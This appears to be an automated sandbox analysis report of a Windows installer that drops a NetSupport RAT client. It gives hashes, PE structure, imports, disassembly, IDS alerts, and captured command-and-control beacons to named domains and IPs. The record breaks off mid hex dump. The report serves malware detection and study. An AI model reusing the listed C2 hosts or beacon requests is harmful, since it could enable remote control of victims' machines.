SHA1:	A5679174D941919BAF764F94640994C01D695625
SHA-256:	73A522D9FFA9235FE2B6FD1059C551F8022437EC0EEF62EBC07240158F84A2A6
SHA-512:	13F76217664056D1FBB106820A3A7E3F44E81CD373C812E89BD6D315AC2A188A8140E0EC0A7BDA02BE62AFAB86F8962340E5889C6BBE36305C96D700871F9E1E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.\|."...Rich#...........PE..L......^.....................J.......!............@.......................... ............@....................................<.......T................K..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\installPackage.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	2275903
Entropy (8bit):	7.997003172118591
Encrypted:	true
SSDEEP:	49152:StY8YsXuUchyrrP04n5YQIQNtV8CyU7XBffG4ABLOdPY:v8Ysa8PDcQNtVzyc2JlOVY
MD5:	C56A7DCC8C1658FA154501AC0819BA7E
SHA1:	DF1910FF30AA8B64808B7BD7A6558FBFCF731A9A
SHA-256:	D43244539E6F2D18177BD4AEFA92D75F4DCA197B82D01E9D5B6065D501611AE6
SHA-512:	AA06D0B61B163B35B99DC7EDB61655BCB4D9B4C909E3EEBD0D4F587A9CEE8DE8FFD2A0E9FCA44E382D076AF2502EE962D73CD572BE39E8A35ABCFEDB0B386A96
Malicious:	false
Preview:	PK.........0.6........H..... .nskbfltr.infUT...t..F...gt..Fux.............U....@......A<n..<IO+.(Eh...E.NF...dF.o..Z...B......p...3RlRBU....W..$....4l.. .!...QY. ^..m.%......SL......9.w.R.tv....%.}..j..)...........0..F......V1.B6..y.WU...$..M....B1;~...&.)~...I....?.g.._..R..PK.........H...PK...........W.............. .NSM.LICUT...l}.dl}.dl}.dux.............-..NB1...........]..(7..C...%,.n.....3....6_Sm.......w^..'...=......e.x.f+$dW. .I.=.{y#.\|.....C.....tL.q.....hL>Q...D.j..8..W+ ..5\.....v.\|^...../7...X.V...b...9...X@A.....f.:....Fx.@..7.......U.~.PK....k%........PK........S..<.............. .nsm_vpro.iniUT...n:.K...gn:.Kux..............v.........../JLO.w.KL.IM.5..rIMM..I-K..qy..PK..I...-.......PK........bo.H........x..... .pcicapi.dllUT...x. W...gx. Wux...............\SG.8\|.a@ (.D..E1...$,B.[.@.\A.`@..D..1F.K..P...m.u_*.hk....Z..j...TQ.\|..MX.>.............3s.....7....bQ..d.Q.......5@r.....}........2.........~ZJnn........\~...?'/].....k.q....{.Us.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.992821509941649
TrID:	Win32 Executable (generic) a (10002005/4) 98.45% Inno Setup installer (109748/4) 1.08% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	KC0uZWwr8p.exe
File size:	21'424'072 bytes
MD5:	3c387c0db035c0c3185d6fbd1ab46bd1
SHA1:	7b6e6212a6d13800282bd2cb362c2a311d89e543
SHA256:	a1720d68eef7dc381a533fd8584a227db3dbcaed16098a0d7f31077f95355e8c
SHA512:	a6e431c98cafaf3762d5d1d60ab337d4a002c0dd90ae830d6b513c97e333adc3bdf8ce70ad65d6149878fb48d94b762902038d44909b662603c6082997071e76
SSDEEP:	393216:xrjU2t/X9E3JMUNccjPql0NbgVunl22V5v+8gDRmffwuvO:tjU2p9EZvNdjP6Kbaunldv+8ORmXwu2
TLSH:	07273373B787A43EF09E1B3B15B2A16844FBA6116923AE1385F484BCCF650501E7F71A
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	af4f59b4f071970c

Static PE Info

General

Entrypoint:	0x4a83bc
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	40ab50289f7ef5fae60801f88d4541fc

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	A certificate was explicitly revoked by its issuer
Error Number:	-2146762484
Not Before, Not After	26/09/2024 08:47:26 27/09/2025 08:47:26
Subject Chain	E=makedasalzbergneu79@gmail.com, CN=OMICARE JOINT STOCK COMPANY, O=OMICARE JOINT STOCK COMPANY, L=Ha Noi, S=Ha Noi, C=VN, OID.1.3.6.1.4.1.311.60.2.1.2=Ha Noi, OID.1.3.6.1.4.1.311.60.2.1.3=VN, SERIALNUMBER=0108523661, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	92142F58BB541C3BD5CD828C76AE0FC4
Thumbprint SHA-1:	56FC98490B4845072947536B9E0AC121A37744E6
Thumbprint SHA-256:	CF7A5967658B1BDB4A50A13D22EF734C707876B01D8D4B1F94FA493C5D4F3F57
Serial:	7F07AA1BB8A3B0183893B1AA

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2EBCh
call 00007FB08CAAA435h
xor eax, eax
push ebp
push 004A8AC1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A8A7Bh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004B0634h]
call 00007FB08CB3BDBBh
call 00007FB08CB3B90Eh
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007FB08CB365E8h
mov edx, dword ptr [ebp-14h]
mov eax, 004B41F4h
call 00007FB08CAA44E3h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004B41F4h]
mov dl, 01h
mov eax, dword ptr [0049CD14h]
call 00007FB08CB37913h
mov dword ptr [004B41F8h], eax
xor edx, edx
push ebp
push 004A8A27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007FB08CB3BE43h
mov dword ptr [004B4200h], eax
mov eax, dword ptr [004B4200h]
cmp dword ptr [eax+0Ch], 01h
jne 00007FB08CB42B2Ah
mov eax, dword ptr [004B4200h]
mov edx, 00000028h
call 00007FB08CB38208h
mov edx, dword ptr [004B4200h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb7000	0x71	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5000	0xfec	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcb000	0x992c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x146be88	0x2940
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0x10fa8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb9000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb52d4	0x25c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xb6000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa568c	0xa5800	b889d302f6fc48a904de33d8d947ae80	False	0.3620185045317221	data	6.377190161826806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xa7000	0x1b64	0x1c00	588dd0a8ab499300d3701cbd11b017d9	False	0.548828125	data	6.109264411030635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa9000	0x3838	0x3a00	5c0c76e77aef52ebc6702430837ccb6e	False	0.35338092672413796	data	4.95916338709992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xad000	0x7258	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb5000	0xfec	0x1000	627340dff539ef99048969aa4824fb2d	False	0.380615234375	data	5.020404933181373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xb6000	0x1a4	0x200	fd11c1109737963cc6cb7258063abfd6	False	0.34765625	data	2.729290535217263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xb7000	0x71	0x200	7de8ca0c7a61668a728fd3a88dc0942d	False	0.1796875	data	1.305578535725827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xb8000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb9000	0x5d	0x200	d84006640084dc9f74a07c2ff9c7d656	False	0.189453125	data	1.3892750148744617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0x10fa8	0x11000	a85fda2741bd9417695daa5fc5a9d7a5	False	0.5789579503676471	data	6.709466460182023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcb000	0x992c	0x9a00	a96400d0405eea27a4090faf59bfb3d4	False	0.3461596996753247	data	5.199307267733568	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcb5b8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5472972972972973
RT_ICON	0xcb6e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.34104046242774566
RT_ICON	0xcbc48	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.396505376344086
RT_ICON	0xcbf30	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.5401624548736462
RT_ICON	0xcc7d8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.2475609756097561
RT_ICON	0xcce40	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.42510660980810233
RT_ICON	0xcdce8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5310283687943262
RT_ICON	0xce150	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5316604127579737
RT_ICON	0xcf1f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.3271784232365145
RT_STRING	0xd17a0	0x3f8	data			0.3198818897637795
RT_STRING	0xd1b98	0x2dc	data			0.36475409836065575
RT_STRING	0xd1e74	0x430	data			0.40578358208955223
RT_STRING	0xd22a4	0x44c	data			0.38636363636363635
RT_STRING	0xd26f0	0x2d4	data			0.39226519337016574
RT_STRING	0xd29c4	0xb8	data			0.6467391304347826
RT_STRING	0xd2a7c	0x9c	data			0.6410256410256411
RT_STRING	0xd2b18	0x374	data			0.4230769230769231
RT_STRING	0xd2e8c	0x398	data			0.3358695652173913
RT_STRING	0xd3224	0x368	data			0.3795871559633027
RT_STRING	0xd358c	0x2a4	data			0.4275147928994083
RT_RCDATA	0xd3830	0x10	data			1.5
RT_RCDATA	0xd3840	0x310	data			0.6173469387755102
RT_RCDATA	0xd3b50	0x2c	data			1.2045454545454546
RT_GROUP_ICON	0xd3b7c	0x84	data	English	United States	0.6666666666666666
RT_VERSION	0xd3c00	0x584	data	English	United States	0.29461756373937675
RT_MANIFEST	0xd4184	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

Exports

Name	Ordinal	Address
__dbk_fcall_wrapper	2	0x40fc10
dbkFCallWrapperAddr	1	0x4b063c

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-08T19:14:50.541645+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.10	49837	151.236.16.15	443	TCP
2024-11-08T19:14:50.541645+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.10	49838	199.188.200.195	443	TCP
2024-11-08T19:15:13.725991+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.10	49787	TCP
2024-11-08T19:15:53.696550+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.10	49949	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 8, 2024 19:15:23.633352995 CET	49837	443	192.168.2.10	151.236.16.15
Nov 8, 2024 19:15:23.633409977 CET	443	49837	151.236.16.15	192.168.2.10
Nov 8, 2024 19:15:23.633481026 CET	49837	443	192.168.2.10	151.236.16.15
Nov 8, 2024 19:15:23.750993967 CET	49837	443	192.168.2.10	151.236.16.15
Nov 8, 2024 19:15:23.751029015 CET	443	49837	151.236.16.15	192.168.2.10
Nov 8, 2024 19:15:23.751106024 CET	443	49837	151.236.16.15	192.168.2.10
Nov 8, 2024 19:15:23.815346003 CET	49838	443	192.168.2.10	199.188.200.195
Nov 8, 2024 19:15:23.815388918 CET	443	49838	199.188.200.195	192.168.2.10
Nov 8, 2024 19:15:23.815892935 CET	49838	443	192.168.2.10	199.188.200.195
Nov 8, 2024 19:15:23.820292950 CET	49838	443	192.168.2.10	199.188.200.195
Nov 8, 2024 19:15:23.820303917 CET	443	49838	199.188.200.195	192.168.2.10
Nov 8, 2024 19:15:23.820348024 CET	443	49838	199.188.200.195	192.168.2.10
Nov 8, 2024 19:15:24.498410940 CET	49841	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:24.504143953 CET	80	49841	104.26.0.231	192.168.2.10
Nov 8, 2024 19:15:24.504264116 CET	49841	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:24.504554987 CET	49841	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:24.509933949 CET	80	49841	104.26.0.231	192.168.2.10
Nov 8, 2024 19:15:25.401092052 CET	80	49841	104.26.0.231	192.168.2.10
Nov 8, 2024 19:15:25.401165962 CET	49841	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:25.413537979 CET	49841	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:25.413604975 CET	49841	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:25.417484045 CET	49842	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:25.422420979 CET	80	49842	104.26.0.231	192.168.2.10
Nov 8, 2024 19:15:25.422506094 CET	49842	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:25.422672987 CET	49842	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:25.427642107 CET	80	49842	104.26.0.231	192.168.2.10
Nov 8, 2024 19:15:26.370369911 CET	80	49842	104.26.0.231	192.168.2.10
Nov 8, 2024 19:15:26.370446920 CET	49842	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:26.370641947 CET	80	49842	104.26.0.231	192.168.2.10
Nov 8, 2024 19:15:26.370871067 CET	49842	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:26.370894909 CET	49842	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:26.370917082 CET	49842	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:26.371673107 CET	49846	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:26.376526117 CET	80	49846	104.26.0.231	192.168.2.10
Nov 8, 2024 19:15:26.376630068 CET	49846	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:26.376847029 CET	49846	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:26.381644011 CET	80	49846	104.26.0.231	192.168.2.10
Nov 8, 2024 19:15:27.283221960 CET	80	49846	104.26.0.231	192.168.2.10
Nov 8, 2024 19:15:27.283322096 CET	49846	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:27.283785105 CET	49846	80	192.168.2.10	104.26.0.231
Nov 8, 2024 19:15:27.283818960 CET	49846	80	192.168.2.10	104.26.0.231

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 8, 2024 19:15:23.598593950 CET	64440	53	192.168.2.10	1.1.1.1
Nov 8, 2024 19:15:23.618889093 CET	53	64440	1.1.1.1	192.168.2.10
Nov 8, 2024 19:15:23.752314091 CET	49869	53	192.168.2.10	1.1.1.1
Nov 8, 2024 19:15:23.810543060 CET	53	49869	1.1.1.1	192.168.2.10
Nov 8, 2024 19:15:24.480323076 CET	52621	53	192.168.2.10	1.1.1.1
Nov 8, 2024 19:15:24.493854046 CET	53	52621	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 8, 2024 19:15:23.598593950 CET	192.168.2.10	1.1.1.1	0xd3b1	Standard query (0)	payiki.com	A (IP address)	IN (0x0001)	false
Nov 8, 2024 19:15:23.752314091 CET	192.168.2.10	1.1.1.1	0x1fb3	Standard query (0)	anyhowdo.com	A (IP address)	IN (0x0001)	false
Nov 8, 2024 19:15:24.480323076 CET	192.168.2.10	1.1.1.1	0xe9c6	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 8, 2024 19:15:23.618889093 CET	1.1.1.1	192.168.2.10	0xd3b1	No error (0)	payiki.com	151.236.16.15	A (IP address)	IN (0x0001)	false
Nov 8, 2024 19:15:23.810543060 CET	1.1.1.1	192.168.2.10	0x1fb3	No error (0)	anyhowdo.com	199.188.200.195	A (IP address)	IN (0x0001)	false
Nov 8, 2024 19:15:24.493854046 CET	1.1.1.1	192.168.2.10	0xe9c6	No error (0)	geo.netsupportsoftware.com	104.26.0.231	A (IP address)	IN (0x0001)	false
Nov 8, 2024 19:15:24.493854046 CET	1.1.1.1	192.168.2.10	0xe9c6	No error (0)	geo.netsupportsoftware.com	104.26.1.231	A (IP address)	IN (0x0001)	false
Nov 8, 2024 19:15:24.493854046 CET	1.1.1.1	192.168.2.10	0xe9c6	No error (0)	geo.netsupportsoftware.com	172.67.68.212	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

151.236.16.15connection: keep-alivecmd=pollinfo=1ack=1

199.188.200.195connection: keep-alivecmd=pollinfo=1ack=1

geo.netsupportsoftware.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49837	151.236.16.15	443	6588	C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 19:15:23.750993967 CET	218	OUT	POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49838	199.188.200.195	443	6588	C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 19:15:23.820292950 CET	222	OUT	POST http://199.188.200.195/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 199.188.200.195Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49841	104.26.0.231	80	6588	C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 19:15:24.504554987 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Nov 8, 2024 19:15:25.401092052 CET	1098	IN	HTTP/1.1 404 Not Found Date: Fri, 08 Nov 2024 18:15:25 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8df78c5d5c396c1a-DFW CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QY0IX7lG17NYDRxwLZt7yTP7c9Nrl3BkpE7lI9qKQ9umEPy9ozFcFKPsnmre9di09hgge5jbXoTD47Hyo1%2BClAjLDCrG6U8kABxZb62e4Cmi6oodvNN3O58OPEDnpdWrlJ1FK8SvfjunX%2B%2BQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49842	104.26.0.231	80	6588	C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 19:15:25.422672987 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Nov 8, 2024 19:15:26.370369911 CET	1103	IN	HTTP/1.1 404 Not Found Date: Fri, 08 Nov 2024 18:15:26 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8df78c634b3ae792-DFW CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2B%2Bgn9Sju7ghC7YwbcS9HLvVhU6izqF1xugQFpR1ru%2FVHkKPs8QXYspj4ci%2FnDz30yCX4Kz%2BSMvqQnQM6xi9YyfBSDbwGc%2FVG9hNTZbBAPsUyeSqCgwFD%2BwYG7anT3%2BAJvQ6pYbvF05pELsc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1628&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 